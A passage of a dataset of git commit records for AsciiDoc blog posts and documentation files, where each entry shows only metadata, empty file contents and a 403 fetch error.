blogpost\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2022-11-15-filling-the-ranks.adoc","new_file":"_posts\/2022-11-15-filling-the-ranks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77dee214588e57846a8f03169c85f1377c28de92","subject":"Update 2016-10-11-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","message":"Update 2016-10-11-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","repos":"luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2016-10-11-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","new_file":"_posts\/2016-10-11-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2825e997aecfe6982af3a2d2f2408fc7f1f92ba5","subject":"Update graceful-shutdown.adoc (#6579)","message":"Update graceful-shutdown.adoc (#6579)\n\nTypo","repos":"tadayosi\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,adessaigne\/camel,tadayosi\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,christophd\/camel,apache\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,adessaigne\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,cunningt\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/graceful-shutdown.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/graceful-shutdown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fa2d2fecce69c783c9e38813e0b6a08a062f3e5","subject":"Update 2011-09-26-1651-Changement-du-theme.adoc","message":"Update 2011-09-26-1651-Changement-du-theme.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-09-26-1651-Changement-du-theme.adoc","new_file":"_posts\/2011-09-26-1651-Changement-du-theme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16b39c2d38d8ab6ab36b0b50a187325b4bc3bafa","subject":"Update 2017-08-17-Acemice-Belki-Hadsizce-6.adoc","message":"Update 2017-08-17-Acemice-Belki-Hadsizce-6.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-08-17-Acemice-Belki-Hadsizce-6.adoc","new_file":"_posts\/2017-08-17-Acemice-Belki-Hadsizce-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b30fd3476cead7f1a12f0f49b0867bbf174774e8","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12a7e354c6ada9e83f9e5dfe0a679168a575eb20","subject":"react section","message":"react section\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"React.adoc","new_file":"React.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"7dfb0a829b2cc0bff29285309d4f63ea89702dc9","subject":"Update 2015-01-23-Preparando-um-projeto-Cordova-para-publicacao.adoc","message":"Update 2015-01-23-Preparando-um-projeto-Cordova-para-publicacao.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-01-23-Preparando-um-projeto-Cordova-para-publicacao.adoc","new_file":"_posts\/2015-01-23-Preparando-um-projeto-Cordova-para-publicacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"497e6dcb09189d423ba980dbb96f9173872ba890","subject":"API-Guide.adoc","message":"API-Guide.adoc\n","repos":"sawied\/swp,sawied\/swp,sawied\/swp","old_file":"service\/src\/main\/asciidoc\/API-Guide.adoc","new_file":"service\/src\/main\/asciidoc\/API-Guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sawied\/swp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8bfebd2c846217b8a8b69020b7216df8f9df5c87","subject":"add QUICKSTART document","message":"add QUICKSTART document\n","repos":"brainpower\/checkarg,brainpower\/checkarg,brainpower\/checkarg,brainpower\/checkarg,brainpower\/checkarg","old_file":"QUICKSTART.asciidoc","new_file":"QUICKSTART.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brainpower\/checkarg.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d113710a13c0885abb3ae64ee016bb236765129","subject":"Lambdas doc","message":"Lambdas doc\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Syntax\/Lambdas.adoc","new_file":"Syntax\/Lambdas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81440c7da534e76bf9e83238ce6403afda04f579","subject":":memo: docker snippets","message":":memo: docker snippets\n","repos":"syon\/refills","old_file":"src\/refills\/docker\/nodejs-code-tips.adoc","new_file":"src\/refills\/docker\/nodejs-code-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46dbc4fe24e2ec8dfb67e1f6527857932305088c","subject":"Update 2016-11-10.adoc","message":"Update 2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10.adoc","new_file":"_posts\/2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b056ca352d9308d04ee64223548d1eb37a9cb12","subject":"y2b create post SECRET AGENT GLOVE PHONE","message":"y2b create post SECRET AGENT GLOVE PHONE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-22-SECRET-AGENT-GLOVE-PHONE.adoc","new_file":"_posts\/2016-06-22-SECRET-AGENT-GLOVE-PHONE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48df205f051a90e10ebd7a10ac15723e937d2442","subject":"Update 2016-04-21-.adoc","message":"Update 2016-04-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-21-.adoc","new_file":"_posts\/2016-04-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f07df67dbaf72b014058497f889539f978721f3","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2aa4c7e0a4f5f8d45adad041f4adb3110601309","subject":"Update 2015-06-15-Document-Title.adoc","message":"Update 2015-06-15-Document-Title.adoc","repos":"davehardy20\/davehardy20.github.io,davehardy20\/davehardy20.github.io,davehardy20\/davehardy20.github.io","old_file":"_posts\/2015-06-15-Document-Title.adoc","new_file":"_posts\/2015-06-15-Document-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davehardy20\/davehardy20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"975cdd5455763e39137bbeed562daeaac1001620","subject":"Update 2015-11-17-Reconhecimento-da-Funarte.adoc","message":"Update 2015-11-17-Reconhecimento-da-Funarte.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-17-Reconhecimento-da-Funarte.adoc","new_file":"_posts\/2015-11-17-Reconhecimento-da-Funarte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cafb705abe861dfe8e5d967df1b64199254056b1","subject":"y2b create post Eton Mobius iPhone 4S Case (Solar Case)","message":"y2b create post Eton Mobius iPhone 4S Case (Solar Case)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-19-Eton-Mobius-iPhone-4S-Case-Solar-Case.adoc","new_file":"_posts\/2011-11-19-Eton-Mobius-iPhone-4S-Case-Solar-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2abf58bd2fbc331da387a5d359cc67238ac171f5","subject":"Update 2016-07-17-Sin.adoc","message":"Update 2016-07-17-Sin.adoc","repos":"gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io","old_file":"_posts\/2016-07-17-Sin.adoc","new_file":"_posts\/2016-07-17-Sin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gorjason\/gorjason.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e899907219b2b95944edd61c26ebf52e15b1a6de","subject":"Update 2016-08-31-php.adoc","message":"Update 2016-08-31-php.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-31-php.adoc","new_file":"_posts\/2016-08-31-php.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c517788c56bc0157ddd24588842fb5bfcdbcebc","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaf6a8b9fe2d738169ec55512b5169d60c50e5bd","subject":"CORS blogpost","message":"CORS blogpost\n","repos":"apiman\/apiman.github.io,msavy\/apiman.github.io,kahboom\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2015-07-02-cors.adoc","new_file":"_blog-src\/_posts\/2015-07-02-cors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kahboom\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a03f145676f707b564b25aff78112eb4285e2cc2","subject":"Update 2016-08-29-Windows-Server.adoc","message":"Update 2016-08-29-Windows-Server.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-29-Windows-Server.adoc","new_file":"_posts\/2016-08-29-Windows-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20601e5f5f8aa49a97afe316e79345b9a773b01e","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc9dbcbd7717e5592be91427d3c07fcf058b87a9","subject":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","message":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59c15a4a2369b294c49487ac1b91e5cc1ce01922","subject":"Remove obsolete warning from note.1.adoc","message":"Remove obsolete warning from note.1.adoc\n","repos":"rumpelsepp\/pynote","old_file":"man\/note.1.adoc","new_file":"man\/note.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8d7c9a3527bf09e5f88e8b0882bae81956135a2","subject":"Update 2015-05-26-This-is-a-new-Blog.adoc","message":"Update 2015-05-26-This-is-a-new-Blog.adoc","repos":"henryouly\/henryouly.github.io,henryouly\/henryouly.github.io,henryouly\/henryouly.github.io","old_file":"_posts\/2015-05-26-This-is-a-new-Blog.adoc","new_file":"_posts\/2015-05-26-This-is-a-new-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/henryouly\/henryouly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c21d4a86d7eda8900b75d2113aa667768e616ad","subject":"Update 2017-09-18-UIUCTF-2017-Crypto.adoc","message":"Update 2017-09-18-UIUCTF-2017-Crypto.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b579b457a9e921c571d39fc4570897710d13abc2","subject":"Update 2015-03-05-puppetlabs-aptnext.adoc","message":"Update 2015-03-05-puppetlabs-aptnext.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-03-05-puppetlabs-aptnext.adoc","new_file":"_posts\/2015-03-05-puppetlabs-aptnext.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f949d707b17a10a69935f3a3fcc8e9dc1d70f28","subject":"Deleted _posts\/2016-11-05-Saturday-Remainder.adoc","message":"Deleted _posts\/2016-11-05-Saturday-Remainder.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Saturday-Remainder.adoc","new_file":"_posts\/2016-11-05-Saturday-Remainder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c2601b7b363a02c7d1949cfcfa761d0f30b4dcf","subject":"Update 2010-05-19-Android-21-passe-en-tete.adoc","message":"Update 2010-05-19-Android-21-passe-en-tete.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-05-19-Android-21-passe-en-tete.adoc","new_file":"_posts\/2010-05-19-Android-21-passe-en-tete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7faa8f757f1b94638267e9c9ccf8280a1714310","subject":"Update 2017-09-24-Backdoor-CTF-2017-Crypto.adoc","message":"Update 2017-09-24-Backdoor-CTF-2017-Crypto.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7541711f0910d664918fab28aa7a0fd866572d5","subject":"Update 2016-01-25-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","message":"Update 2016-01-25-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-01-25-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","new_file":"_posts\/2016-01-25-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74aeafd88935e9f837303288c5971b21243bbfcc","subject":"Update 2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","message":"Update 2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","new_file":"_posts\/2019-04-07-IPSEC-S2S-From-Azure-Stack-to-Mikrotik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"832a8c79ac681d52b97236ce4b54c9b70f63fb6c","subject":"Update 2016-12-31-Chocolate-Peanut-Butter-Smoothie-Bowl.adoc","message":"Update 2016-12-31-Chocolate-Peanut-Butter-Smoothie-Bowl.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-12-31-Chocolate-Peanut-Butter-Smoothie-Bowl.adoc","new_file":"_posts\/2016-12-31-Chocolate-Peanut-Butter-Smoothie-Bowl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a43e966f3d4b1697c22b5f40467195293eee93fd","subject":"Update 2015-05-18-My-Title.adoc","message":"Update 2015-05-18-My-Title.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-05-18-My-Title.adoc","new_file":"_posts\/2015-05-18-My-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"255de9c7ee47a89e33d905dd13f361f684d18f30","subject":"Update 2016-09-11-Test-post.adoc","message":"Update 2016-09-11-Test-post.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-09-11-Test-post.adoc","new_file":"_posts\/2016-09-11-Test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f7d8db75d46d45ec5a2aa3dd0d705f332c9dbff","subject":"add ClientInfoFormat from the wiki","message":"add ClientInfoFormat from the wiki\n","repos":"ahojjati\/yubikey-val,Yubico\/yubikey-val,Yubico\/yubikey-val,ahojjati\/yubikey-val,ahojjati\/yubikey-val,Yubico\/yubikey-val","old_file":"doc\/ClientInfoFormat.adoc","new_file":"doc\/ClientInfoFormat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-val.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"bec07a7eb50c9f122c7b764a9c470362ad515882","subject":"Add an examples of using UNC path in path.repo","message":"Add an examples of using UNC path in path.repo\n\nCloses #12665\n","repos":"nrkkalyan\/elasticsearch,Charlesdong\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,bestwpw\/elasticsearch,scottsom\/elasticsearch,elasticdog\/elasticsearch,petabytedata\/elasticsearch,spiegela\/elasticsearch,djschny\/elasticsearch,JSCooke\/elasticsearch,achow\/elasticsearch,jimhooker2002\/elasticsearch,kenshin233\/elasticsearch,F0lha\/elasticsearch,tahaemin\/elasticsearch,nazarewk\/elasticsearch,sdauletau\/elasticsearch,kalburgimanjunath\/elasticsearch,drewr\/elasticsearch,queirozfcom\/elasticsearch,yynil\/elasticsearch,xingguang2013\/elasticsearch,palecur\/elasticsearch,lightslife\/elasticsearch,nomoa\/elasticsearch,markharwood\/elasticsearch,lzo\/elasticsearch-1,Charlesdong\/elasticsearch,ckclark\/elasticsearch,jprante\/elasticsearch,palecur\/elasticsearch,yongminxia\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,a2lin\/elasticsearch,Siddartha07\/elasticsearch,queirozfcom\/elasticsearch,liweinan0423\/elasticsearch,lzo\/elasticsearch-1,wuranbo\/elasticsearch,lydonchandra\/elasticsearch,ckclark\/elasticsearch,ricardocerq\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,ckclark\/elasticsearch,apepper\/elasticsearch,caengcjd\/elasticsearch,caengcjd\/elasticsearch,naveenhooda2000\/elasticsearch,Stacey-Gammon\/elasticsearch,karthikjaps\/elasticsearch,zhiqinghuang\/elasticsearch,wimvds\/elasticsearch,ouyangkongtong\/elasticsearch,xingguang2013\/elasticsearch,mm0\/elasticsearch,achow\/elasticsearch,polyfractal\/elasticsearch,HonzaKral\/elasticsearch,Fsero\/elasticsearch,TonyChai24\/ESSource,gingerwizard\/elasticsearch,masterweb121\/elasticsearch,Ansh90\/elasticsearch,LewayneNaidoo\/elasticsearch,springning\/elasticsearch,nknize\/elasticsearch,mm0\/elasticsearch,dataduke\/elasticsearch,kunallimaye\/elasticsearch,sdauletau\/elasticsearch,lydonchandra\/elasticsearch,hirdesh2008\/elasticsearch,drewr\/elasticsearch,gfyoung\/elasticsearch,petabytedata\/elasticsearch,acchen97\/elasticsearch,jbertouch\/elasticsearch,myelin\/elasticsearch,wayeast\/elasticsearch,strapdata\/elassandra-test,Liziyao\/elasticsearch,dataduke\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,dongjoon-hyun\/elasticsearch,Chhunlong\/elasticsearch,cwurm\/elasticsearch,schonfeld\/elasticsearch,weipinghe\/elasticsearch,Shepard1212\/elasticsearch,karthikjaps\/elasticsearch,iantruslove\/elasticsearch,rajanm\/elasticsearch,pablocastro\/elasticsearch,mm0\/elasticsearch,jprante\/elasticsearch,MichaelLiZhou\/elasticsearch,wittyameta\/elasticsearch,strapdata\/elassandra5-rc,bestwpw\/elasticsearch,mjhennig\/elasticsearch,ESamir\/elasticsearch,btiernay\/elasticsearch,TonyChai24\/ESSource,sarwarbhuiyan\/elasticsearch,djschny\/elasticsearch,scottsom\/elasticsearch,Uiho\/elasticsearch,acchen97\/elasticsearch,episerver\/elasticsearch,sc0ttkclark\/elasticsearch,ouyangkongtong\/elasticsearch,lmtwga\/elasticsearch,areek\/elasticsearch,StefanGor\/elasticsearch,Helen-Zhao\/elasticsearch,winstonewert\/elasticsearch,myelin\/elasticsearch,ricardocerq\/elasticsearch,wimvds\/elasticsearch,MichaelLiZhou\/elasticsearch,geidies\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,tsohil\/elasticsearch,wbowling\/elasticsearch,Rygbee\/elasticsearch,pablocastro\/elasticsearch,jango2015\/elasticsearch,xuzha\/elasticsearch,xuzha\/elasticsearch,Liziyao\/elasticsearch,franklanganke\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,kevinkluge\/elasticsearch,diendt\/elasticsearch,Brijeshrpatel9\/elasticsearch,mgalushka\/elasticsearch,nrkkalyan\/elasticsearch,markharwood\/elasticsearch,wbowling\/elasticsearch,bawse\/elasticsearch,Shepard1212\/elasticsearch,MisterAndersen\/elasticsearch,pritishppai\/elasticsearch,kunallimaye\/elasticsearch,YosuaMichael\/elasticsearch,brandonkearby\/elasticsearch,girirajsharma\/elasticsearch,jchampion\/elasticsearch,rhoml\/elasticsearch,JackyMai\/elasticsearch,Widen\/elasticsearch,hafkensite\/elasticsearch,MjAbuz\/elasticsearch,GlenRSmith\/elasticsearch,caengcjd\/elasticsearch,sreeramjayan\/elasticsearch,fernandozhu\/elasticsearch,gfyoung\/elasticsearch,glefloch\/elasticsearch,vingupta3\/elasticsearch,abibell\/elasticsearch,jchampion\/elasticsearch,gmarz\/elasticsearch,fekaputra\/elasticsearch,lks21c\/elasticsearch,jimhooker2002\/elas